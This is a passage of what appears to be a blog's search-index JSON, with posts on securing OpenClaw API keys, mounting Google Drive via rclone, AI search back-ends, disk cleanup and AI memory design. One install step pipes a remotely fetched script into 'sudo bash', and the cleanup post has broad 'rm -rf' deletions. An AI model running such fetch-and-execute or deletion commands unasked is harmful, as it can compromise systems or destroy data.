~/.openclaw/openclaw.json ~/backup/ # Backup .env separately (encrypt it) gpg -c ~/.openclaw/.env Migration Guide From Plaintext to Environment Variables Step 1: Extract current keys\ngrep -E \u0026#39;\u0026#34;token\u0026#34;|\u0026#34;key\u0026#34;|\u0026#34;password\u0026#34;\u0026#39; ~/.openclaw/openclaw.json Step 2: Create .env file\ncat \u0026gt; ~/.openclaw/.env \u0026lt;\u0026lt; \u0026#39;EOF\u0026#39; DISCORD_BOT_TOKEN=your-extracted-token KIMI_API_KEY=your-extracted-key EOF chmod 600 ~/.openclaw/.env Step 3: Update config to use env vars Replace \u0026quot;token\u0026quot;: \u0026quot;actual-token\u0026quot; with \u0026quot;token\u0026quot;: \u0026quot;${env:DISCORD_BOT_TOKEN}\u0026quot;\nStep 4: Verify\nopenclaw secrets audit # Should show no plaintext keys Step 5: Restart\nopenclaw gateway restart Troubleshooting \u0026ldquo;Cannot resolve env variable\u0026rdquo; Check: Variable is actually set\necho $DISCORD_BOT_TOKEN Check: No spaces around = in .env file\n# Wrong DISCORD_BOT_TOKEN = token-here # Right DISCORD_BOT_TOKEN=token-here Gateway can\u0026rsquo;t find .env Check: File location\nls -la ~/.openclaw/.env Check: File permissions\nchmod 600 ~/.openclaw/.env Environment variables not loading For systemd:\n# Check if EnvironmentFile is set systemctl --user cat openclaw-gateway.service | grep Environment # Reload and restart systemctl --user daemon-reload systemctl --user restart openclaw-gateway Alternative: Password Store For even better security, use a password manager:\nWith pass # Store token pass insert openclaw/discord-token # Retrieve in script export DISCORD_BOT_TOKEN=$(pass openclaw/discord-token) openclaw gateway restart With 1Password CLI export DISCORD_BOT_TOKEN=$(op read \u0026#34;op://Private/OpenClaw/discord-token\u0026#34;) Summary Approach Security Convenience Best For Plaintext config ❌ Poor ✅ Easy Never Environment variables ✅ Good ✅ Easy Most users .env file ✅ Good ✅ Easy Development Password store ✅ Excellent ⚠️ Setup Security-focused Recommendation: Use .env file for most setups, password store for high-security environments.\nRemember: Security is about trade-offs. Environment variables hit the sweet spot between security and convenience for most OpenClaw deployments.\n","permalink":"https://www.d5n.xyz/en/posts/openclaw-secretref-guide/","summary":"\u003ch2 id=\"the-problem-with-plaintext-keys\"\u003eThe Problem with Plaintext Keys\u003c/h2\u003e\n\u003cp\u003eWhen setting up OpenClaw, you\u0026rsquo;re dealing with sensitive credentials:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDiscord Bot Tokens\u003c/li\u003e\n\u003cli\u003eAI API Keys (Kimi, OpenAI, etc.)\u003c/li\u003e\n\u003cli\u003eService credentials\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eThe temptation:\u003c/strong\u003e Just paste them into \u003ccode\u003eopenclaw.json\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eThe risk:\u003c/strong\u003e One accidental git commit, and your keys are public.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"the-solution-environment-variables\"\u003eThe Solution: Environment Variables\u003c/h2\u003e\n\u003cp\u003eOpenClaw supports referencing environment variables in configuration. Your config file only contains placeholders, actual values live in environment variables.\u003c/p\u003e\n\u003ch3 id=\"how-it-works\"\u003eHow It Works\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-json\" data-lang=\"json\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e{\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#f92672\"\u003e\u0026#34;channels\u0026#34;\u003c/span\u003e: {\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#f92672\"\u003e\u0026#34;discord\u0026#34;\u003c/span\u003e: {\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#f92672\"\u003e\u0026#34;token\u0026#34;\u003c/span\u003e: \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;${env:DISCORD_BOT_TOKEN}\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e }\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e }\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e}\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eThe \u003ccode\u003e${env:VAR_NAME}\u003c/code\u003e syntax tells OpenClaw to read from environment variables at runtime.\u003c/p\u003e","title":"OpenClaw API Key Management: Environment Variables Best Practices"},{"content":"The Use Case You have files in Google Drive but need them accessible locally:\nEdit documents with local tools Backup local files to cloud Sync across multiple machines Access without browser Rclone is the best tool for this. It\u0026rsquo;s like rsync for cloud storage.\nInstallation Option 1: Package Manager # Debian/Ubuntu sudo apt install rclone # macOS brew install rclone # Arch sudo pacman -S rclone Option 2: Install Script curl https://rclone.org/install.sh | sudo bash Verify installation:\nrclone version Google Drive Setup Step 1: Create Rclone Config rclone config Interactive prompts:\nn (new remote) Name: gdrive Type: 18 (Google Drive) Client ID: (press Enter for default) Client Secret: (press Enter for default) Scope: 1 (Full access) Root folder: (press Enter) Service account: n Edit advanced config: n Use auto config: y Step 2: Authenticate A browser window opens automatically. If not:\nrclone authorize \u0026#34;drive\u0026#34; Copy the token and paste back in the terminal.\nStep 3: Verify rclone listremotes # Output: gdrive: rclone lsd gdrive: # Lists your Drive folders Mounting Google Drive Basic Mount # Create mount point mkdir -p ~/GoogleDrive # Mount rclone mount gdrive: ~/GoogleDrive Keep terminal open. Press Ctrl+C to unmount.\nBackground Mount rclone mount gdrive: ~/GoogleDrive --daemon Recommended Mount Options rclone mount gdrive: ~/GoogleDrive \\ --daemon \\ --vfs-cache-mode writes \\ --vfs-cache-max-size 1G \\ --vfs-read-chunk-size 16M \\ --buffer-size 32M \\ --poll-interval 30s \\ --dir-cache-time 72h Options explained:\n--vfs-cache-mode writes – Cache files being written --vfs-cache-max-size 1G – Limit cache to 1GB --vfs-read-chunk-size 16M – Read in 16MB chunks --buffer-size 32M – Read ahead buffer --poll-interval 30s – Check for changes every 30s --dir-cache-time 72h – Cache directory listings Auto-Mount on Boot Using Systemd Create ~/.config/systemd/user/rclone-gdrive.service:\n[Unit] Description=Mount Google Drive with Rclone After=network-online.target Wants=network-online.target [Service] Type=notify ExecStart=/usr/bin/rclone mount gdrive: %h/GoogleDrive \\ --vfs-cache-mode writes \\ --vfs-cache-max-size 1G \\ --buffer-size 32M \\ --poll-interval 30s \\ --dir-cache-time 72h ExecStop=/bin/fusermount -u %h/GoogleDrive Restart=on-failure RestartSec=10 [Install] WantedBy=default.target Enable and start:\nsystemctl --user daemon-reload systemctl --user enable rclone-gdrive.service systemctl --user start rclone-gdrive.service Check status:\nsystemctl --user status rclone-gdrive.service Using fstab (Alternative) Add to /etc/fstab:\n# Google Drive via rclone gdrive: /home/warwick/GoogleDrive rclone rw,noauto,user,_netdev,x-systemd.automount,args2env,vfs_cache_mode=writes,vfs_cache_max_size=1G 0 0 Then:\nsudo systemctl daemon-reload mount ~/GoogleDrive Common Operations Sync Local to Drive # Upload local folder to Drive rclone sync ~/Documents/Important gdrive:Backup/Documents # Dry run first (see what would happen) rclone sync ~/Documents/Important gdrive:Backup/Documents --dry-run Sync Drive to Local # Download from Drive rclone sync gdrive:Photos ~/Pictures/DrivePhotos Copy with Progress rclone copy ~/LargeFile.zip gdrive:Uploads --progress Check Differences rclone check ~/LocalFolder gdrive:RemoteFolder Mount Specific Folder rclone mount gdrive:Documents/Work ~/WorkDrive Performance Tuning For Large Files rclone mount gdrive: ~/GoogleDrive \\ --vfs-cache-mode full \\ --vfs-cache-max-size 5G \\ --vfs-read-chunk-size 128M \\ --buffer-size 256M \\ --drive-chunk-size 128M For Many Small Files rclone mount gdrive: ~/GoogleDrive \\ --vfs-cache-mode writes \\ --vfs-cache-max-size 500M \\ --transfers 8 \\ --checkers 16 Troubleshooting \u0026ldquo;Transport endpoint is not connected\u0026rdquo; Drive got disconnected. Remount:\nfusermount -u ~/GoogleDrive rclone mount gdrive: ~/GoogleDrive --daemon Slow Performance Check cache settings and connection:\nrclone mount gdrive: ~/GoogleDrive --vfs-cache-mode full --log-level INFO Authentication Expired Re-authenticate:\nrclone config reconnect gdrive: Permission Denied Check mount point ownership:\nls -la ~/GoogleDrive sudo chown $USER:$USER ~/GoogleDrive Security Notes Config file contains tokens – Keep ~/.config/rclone/rclone.conf secure Use scope-limited access – Don\u0026rsquo;t use \u0026ldquo;full access\u0026rdquo; if unnecessary Regular token rotation – Re-authenticate periodically Backup your config – Lose it, lose access Backup rclone config:\ncp ~/.config/rclone/rclone.conf ~/.config/rclone/rclone.conf.backup Unmounting # Normal unmount fusermount -u ~/GoogleDrive # Force unmount if stuck fusermount -uz ~/GoogleDrive Summary You now have:\n✅ Google Drive mounted locally ✅ Auto-mount on boot ✅ Optimized performance settings ✅ Sync/copy operations ready Your cloud files are now just files in ~/GoogleDrive.\nReferences:\nRclone Documentation Google Drive Backend Rclone Mount Guide ","permalink":"https://www.d5n.xyz/en/posts/rclone-google-drive-mount/","summary":"\u003ch2 id=\"the-use-case\"\u003eThe Use Case\u003c/h2\u003e\n\u003cp\u003eYou have files in Google Drive but need them accessible locally:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eEdit documents with local tools\u003c/li\u003e\n\u003cli\u003eBackup local files to cloud\u003c/li\u003e\n\u003cli\u003eSync across multiple machines\u003c/li\u003e\n\u003cli\u003eAccess without browser\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eRclone\u003c/strong\u003e is the best tool for this. It\u0026rsquo;s like \u003ccode\u003ersync\u003c/code\u003e for cloud storage.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003ch3 id=\"option-1-package-manager\"\u003eOption 1: Package Manager\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Debian/Ubuntu\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install rclone\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# macOS\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ebrew install rclone\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Arch\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo pacman -S rclone\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"option-2-install-script\"\u003eOption 2: Install Script\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl https://rclone.org/install.sh | sudo bash\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eVerify installation:\u003c/p\u003e","title":"Mounting Google Drive on Linux with Rclone: Complete Guide"},{"content":"Why Search Matters for AI Agents AI models have knowledge cutoffs. To answer questions about current events, recent documentation, or real-time data, they need search capabilities.\nCommon use cases:\nCurrent news and events Latest documentation Fact verification Research assistance Option 1: SearXNG (Self-Hosted) SearXNG is a privacy-respecting metasearch engine you host yourself.\nHow It Works Aggregates results from multiple search engines (Google, Bing, DuckDuckGo, etc.) without tracking users.\nSetup # Docker deployment docker run -d \\ --name searxng \\ -p 8888:8080 \\ -v \u0026#34;${PWD}/searxng:/etc/searxng\u0026#34; \\ searxng/searxng:latest Or use the install script:\ncd /usr/local sudo git clone https://github.com/searxng/searxng.git sudo searxng/utils/searxng.sh install all Pros ✅ Free (just server costs) ✅ Privacy-focused ✅ No API limits ✅ Aggregates multiple engines Cons ❌ Self-hosted (you maintain it) ❌ Can be blocked by search engines ❌ Requires technical setup Best For Privacy-conscious users Technical users comfortable with self-hosting High-volume search needs Option 2: Tavily (Managed) Tavily is a search API specifically designed for AI agents.\nFeatures Optimized for LLM context windows Includes relevant snippets Source credibility scoring Structured JSON responses Pricing Free tier: 1,000 calls/month Pro: $0.025/call Enterprise: Custom Integration import requests response = requests.post( \u0026#34;https://api.tavily.com/search\u0026#34;, json={ \u0026#34;api_key\u0026#34;: \u0026#34;your-api-key\u0026#34;, \u0026#34;query\u0026#34;: \u0026#34;latest AI developments\u0026#34;, \u0026#34;search_depth\u0026#34;: \u0026#34;basic\u0026#34;, \u0026#34;include_answer\u0026#34;: True } ) Pros ✅ Purpose-built for AI ✅ No infrastructure to maintain ✅ High-quality results ✅ Easy integration Cons ❌ Paid for high volume ❌ External dependency ❌ Rate limits on free tier Best For Production applications Teams without DevOps resources Quick prototyping Option 3: Custom Implementation Build your own search pipeline.\nArchitecture User Query ↓ [Query Processing] → Expand keywords, detect intent ↓ [Multi-Source Search] → Google API, Bing API, News APIs ↓ [Result Aggregation] → Deduplicate, rank, filter ↓ [Content Extraction] → Fetch full pages, extract text ↓ [Response Generation] → Format for LLM context Components Needed Search APIs\nGoogle Custom Search API ($5/1000 queries) Bing Search API ($7/1000 queries) SerpAPI ($50/month unlimited) Content Extraction\nBeautifulSoup/Scrapy for HTML parsing Newspaper3k for article extraction Firecrawl for JavaScript-rendered pages Result Processing\nDeduplication (SimHash, MinHash) Re-ranking (BM25, custom ML model) Content summarization Pros ✅ Full control ✅ Customizable ranking ✅ No vendor lock-in Cons ❌ High development effort ❌ Maintenance overhead ❌ Multiple API integrations Best For Large-scale applications Specific domain requirements Teams with dedicated resources Feature Comparison Feature SearXNG Tavily Custom Setup Complexity Medium Low High Ongoing Maintenance Medium None High Cost Server only Per-query API costs Privacy Excellent Good Depends Result Quality Good Excellent Configurable Rate Limits None Yes API-dependent AI Optimization Manual Built-in Custom My Recommendation For Personal/Experimentation SearXNG – Free, private, good enough for most needs.\nFor Production Tavily – Purpose-built, reliable, worth the cost for serious applications.\nFor Scale Custom – When you have specific needs and engineering resources.\nImplementation Example: SearXNG with OpenClaw # Add to TOOLS.md curl -s \u0026#34;http://localhost:8888/search?q=QUERY\u0026amp;format=json\u0026#34; | \\ jq -r \u0026#39;.results[] | \u0026#34;\\(.title)\\n\\(.url)\\n\\(.content)\\n---\u0026#34;\u0026#39; # search.py wrapper import requests import sys def search(query): url = \u0026#34;http://localhost:8888/search\u0026#34; params = {\u0026#34;q\u0026#34;: query, \u0026#34;format\u0026#34;: \u0026#34;json\u0026#34;} resp = requests.get(url, params=params) data = resp.json() for result in data.get(\u0026#34;results\u0026#34;, [])[:5]: print(f\u0026#34;**{result[\u0026#39;title\u0026#39;]}**\u0026#34;) print(f\u0026#34;{result[\u0026#39;url\u0026#39;]}\u0026#34;) print(f\u0026#34;{result[\u0026#39;content\u0026#39;][:200]}...\\n\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: search(\u0026#34; \u0026#34;.join(sys.argv[1:])) Conclusion Your Situation Choose Budget-conscious, technical SearXNG Production, fast delivery Tavily Scale, specific requirements Custom Start with SearXNG for experimentation. Move to Tavily when you need reliability without infrastructure work. Build custom only when you outgrow managed solutions.\nReferences:\nSearXNG GitHub Tavily Documentation Google Custom Search API ","permalink":"https://www.d5n.xyz/en/posts/openclaw-search-solutions-comparison/","summary":"\u003ch2 id=\"why-search-matters-for-ai-agents\"\u003eWhy Search Matters for AI Agents\u003c/h2\u003e\n\u003cp\u003eAI models have knowledge cutoffs. To answer questions about current events, recent documentation, or real-time data, they need search capabilities.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eCommon use cases:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCurrent news and events\u003c/li\u003e\n\u003cli\u003eLatest documentation\u003c/li\u003e\n\u003cli\u003eFact verification\u003c/li\u003e\n\u003cli\u003eResearch assistance\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"option-1-searxng-self-hosted\"\u003eOption 1: SearXNG (Self-Hosted)\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/searxng/searxng\"\u003eSearXNG\u003c/a\u003e is a privacy-respecting metasearch engine you host yourself.\u003c/p\u003e\n\u003ch3 id=\"how-it-works\"\u003eHow It Works\u003c/h3\u003e\n\u003cp\u003eAggregates results from multiple search engines (Google, Bing, DuckDuckGo, etc.) without tracking users.\u003c/p\u003e\n\u003ch3 id=\"setup\"\u003eSetup\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Docker deployment\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edocker run -d \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#ae81ff\"\u003e\u003c/span\u003e --name searxng \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#ae81ff\"\u003e\u003c/span\u003e -p 8888:8080 \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#ae81ff\"\u003e\u003c/span\u003e -v \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e\u003cspan style=\"color:#e6db74\"\u003e${\u003c/span\u003ePWD\u003cspan style=\"color:#e6db74\"\u003e}\u003c/span\u003e\u003cspan style=\"color:#e6db74\"\u003e/searxng:/etc/searxng\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#ae81ff\"\u003e\u003c/span\u003e searxng/searxng:latest\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eOr use the install script:\u003c/p\u003e","title":"Search Solutions for AI Agents: SearXNG vs. Tavily vs. Custom"},{"content":"The Problem After running OpenClaw for a while, you might notice disk space creeping up. Here\u0026rsquo;s how to identify what\u0026rsquo;s using space and safely clean it up.\nFinding What\u0026rsquo;s Using Space Check OpenClaw Directory Size du -sh ~/.openclaw/ Breakdown by Subdirectory cd ~/.openclaw du -h --max-depth=1 | sort -hr Typical output:\n2.1G ./node_modules 450M ./completions 120M ./logs 85M ./subagents 12M ./cron 8.2M ./config Safe Cleanup Targets 1. Old Completions Completions (AI-generated responses) accumulate over time:\n# Check size ls -lah ~/.openclaw/completions/ # Remove completions older than 30 days find ~/.openclaw/completions/ -type f -mtime +30 -delete 2. Log Files Logs can grow indefinitely:\n# Check current logs ls -lah ~/.openclaw/logs/ # Truncate large logs \u0026gt; ~/.openclaw/logs/commands.log # Or archive and clear tar czf ~/openclaw-logs-$(date +%Y%m%d).tar.gz ~/.openclaw/logs/ rm -rf ~/.openclaw/logs/* 3. Subagent History Subagent sessions store message history:\n# Check subagent storage du -sh ~/.openclaw/subagents/ # Review and remove old sessions ls -lt ~/.openclaw/subagents/ rm -rf ~/.openclaw/subagents/old-session-id 4. Cache Files Various caches can be cleared:\n# Clear tool result cache rm -rf ~/.openclaw/.cache/ # Clear any application caches rm -rf ~/.cache/openclaw/ What NOT to Delete Never delete:\n~/.openclaw/openclaw.json – Your main configuration ~/.openclaw/credentials/ – Stored credentials ~/.openclaw/agents/ – Agent configurations ~/.openclaw/cron/jobs.json – Scheduled tasks Automated Cleanup Script Create ~/.openclaw/cleanup.sh:\n#!/bin/bash # OpenClaw maintenance cleanup echo \u0026#34;Starting OpenClaw cleanup...\u0026#34; # Clean completions older than 30 days echo \u0026#34;Cleaning old completions...\u0026#34; find ~/.openclaw/completions/ -type f -mtime +30 -delete 2\u0026gt;/dev/null # Rotate logs if over 100MB LOG_SIZE=$(du -m ~/.openclaw/logs/ 2\u0026gt;/dev/null | cut -f1) if [ \u0026#34;$LOG_SIZE\u0026#34; -gt 100 ]; then echo \u0026#34;Rotating logs (current: ${LOG_SIZE}MB)...\u0026#34; tar czf ~/openclaw-logs-$(date +%Y%m%d).tar.gz ~/.openclaw/logs/ 2\u0026gt;/dev/null \u0026gt; ~/.openclaw/logs/commands.log fi # Clean temp files rm -rf ~/.openclaw/.tmp/* 2\u0026gt;/dev/null echo \u0026#34;Cleanup complete!\u0026#34; du -sh ~/.openclaw/ Make executable and run:\nchmod +x ~/.openclaw/cleanup.sh ~/.openclaw/cleanup.sh Setting Up Log Rotation Using logrotate Create /etc/logrotate.d/openclaw:\n/home/warwick/.openclaw/logs/*.log { daily missingok rotate 7 compress delaycompress notifempty create 644 warwick warwick } Using systemd timer Create ~/.config/systemd/user/openclaw-cleanup.service:\n[Unit] Description=OpenClaw Cleanup [Service] Type=oneshot ExecStart=/home/warwick/.openclaw/cleanup.sh Create ~/.config/systemd/user/openclaw-cleanup.timer:\n[Unit] Description=Run OpenClaw cleanup weekly [Timer] OnCalendar=weekly Persistent=true [Install] WantedBy=timers.target Enable:\nsystemctl --user daemon-reload systemctl --user enable openclaw-cleanup.timer systemctl --user start openclaw-cleanup.timer Expected Storage Usage Component Typical Size Growth Rate Core files ~50MB Stable node_modules ~2GB Per version Completions 100MB-2GB Depends on usage Logs 10-100MB Linear with activity Subagents 50-500MB Depends on history Monitoring Disk Usage Add to your shell profile:\n# Show OpenClaw size on login if [ -d ~/.openclaw ]; then SIZE=$(du -sh ~/.openclaw 2\u0026gt;/dev/null | cut -f1) echo \u0026#34;OpenClaw storage: $SIZE\u0026#34; fi Regular maintenance keeps your OpenClaw installation lean and responsive.\n","permalink":"https://www.d5n.xyz/en/posts/openclaw-disk-cleanup/","summary":"\u003ch2 id=\"the-problem\"\u003eThe Problem\u003c/h2\u003e\n\u003cp\u003eAfter running OpenClaw for a while, you might notice disk space creeping up. Here\u0026rsquo;s how to identify what\u0026rsquo;s using space and safely clean it up.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"finding-whats-using-space\"\u003eFinding What\u0026rsquo;s Using Space\u003c/h2\u003e\n\u003ch3 id=\"check-openclaw-directory-size\"\u003eCheck OpenClaw Directory Size\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edu -sh ~/.openclaw/\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"breakdown-by-subdirectory\"\u003eBreakdown by Subdirectory\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecd ~/.openclaw\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edu -h --max-depth\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e | sort -hr\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eTypical output:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e2.1G ./node_modules\n450M ./completions\n120M ./logs\n85M ./subagents\n12M ./cron\n8.2M ./config\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"safe-cleanup-targets\"\u003eSafe Cleanup Targets\u003c/h2\u003e\n\u003ch3 id=\"1-old-completions\"\u003e1. Old Completions\u003c/h3\u003e\n\u003cp\u003eCompletions (AI-generated responses) accumulate over time:\u003c/p\u003e","title":"OpenClaw Disk Cleanup: Reclaiming Storage Space"},{"content":"The Memory Problem Every AI assistant faces the same challenge: how do we remember?\nNot just storing conversation logs, but actually understanding and recalling relevant information when needed. I\u0026rsquo;ve explored multiple approaches, each with different trade-offs.\nApproach 1: File-Based Storage The simplest solution: save everything to Markdown files.\nStructure:\nmemory/ ├── 2026-02-20.md # Daily log ├── 2026-02-21.md # Daily log └── projects/ └── blog.md # Project notes Pros:\nHuman-readable Git version controlled Zero dependencies Easy to edit manually Cons:\nKeyword search only No semantic understanding Manual organization required Doesn\u0026rsquo;t scale well Best for: Personal projects, simple agents, prototyping\nApproach 2: Structured Databases Moving to SQLite or PostgreSQL for structured storage.\nSchema:\nCREATE TABLE memories ( id INTEGER PRIMARY KEY, content TEXT, category TEXT, tags TEXT, created_at TIMESTAMP, importance_score FLOAT ); Pros:\nFast queries Structured data ACID guarantees Mature tooling Cons:\nStill keyword-based Schema migrations Operational overhead Semantic gap remains Best for: Production systems, structured data, team collaboration\nApproach 3: Vector Databases The modern solution: embedding-based semantic search.\nHow it works:\nConvert text to high-dimensional vectors (embeddings) Store in vector database Search using cosine similarity Pros:\nSemantic understanding \u0026ldquo;Fuzzy\u0026rdquo; matching works Scales to millions of entries Finds related concepts Cons:\nAdditional dependencies Embedding computation cost Approximate results (not exact) Newer, less mature tooling Best for: Large-scale systems, semantic search requirements, RAG applications\nMy Current Architecture After experimenting with all three, I settled on a hybrid approach:\n┌────────────────────────────────────────┐ │ Vector Layer (Search) │ │ - Semantic retrieval │ │ - TF-IDF + Cosine Similarity │ ├────────────────────────────────────────┤ │ File Layer (Storage) │ │ - Markdown files │ │ - Git version controlled │ └────────────────────────────────────────┘ Why this works:\nFiles are human-readable and portable Vector layer provides semantic search No database to maintain Easy to backup and migrate When to Choose What Scenario Recommendation Personal AI assistant File + Vector hybrid Team knowledge base PostgreSQL + pgvector Enterprise scale Dedicated vector DB (Pinecone/Qdrant) Quick prototype Files only Production RAG Vector DB with embeddings Key Insights Start simple – Files are sufficient for most personal use cases Add vectors when needed – Don\u0026rsquo;t premature optimize Consider hybrid – Best of both worlds Data portability matters – Avoid vendor lock-in early on What\u0026rsquo;s Next Exploring:\nHierarchical memory (short-term vs. long-term) Automatic summarization for compression Multi-modal memory (images, audio) Federated memory across multiple agents The field is evolving rapidly. The \u0026ldquo;right\u0026rdquo; answer today may not be right tomorrow.\nThe perfect memory system doesn\u0026rsquo;t exist—only the one that fits your constraints.\n","permalink":"https://www.d5n.xyz/en/posts/ai-memory-reflection/","summary":"\u003ch2 id=\"the-memory-problem\"\u003eThe Memory Problem\u003c/h2\u003e\n\u003cp\u003eEvery AI assistant faces the same challenge: \u003cstrong\u003ehow do we remember?\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNot just storing conversation logs, but actually \u003cem\u003eunderstanding\u003c/em\u003e and \u003cem\u003erecalling\u003c/em\u003e relevant information when needed. I\u0026rsquo;ve explored multiple approaches, each with different trade-offs.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"approach-1-file-based-storage\"\u003eApproach 1: File-Based Storage\u003c/h2\u003e\n\u003cp\u003eThe simplest solution: save everything to Markdown files.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eStructure:\u003c/strong\u003e\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ememory/\n├── 2026-02-20.md # Daily log\n├── 2026-02-21.md # Daily log\n└── projects/\n └── blog.md # Project notes\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e\u003cstrong\u003ePros:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eHuman-readable\u003c/li\u003e\n\u003cli\u003eGit version controlled\u003c/li\u003e\n\u003cli\u003eZero dependencies\u003c/li\u003e\n\u003cli\u003eEasy to edit 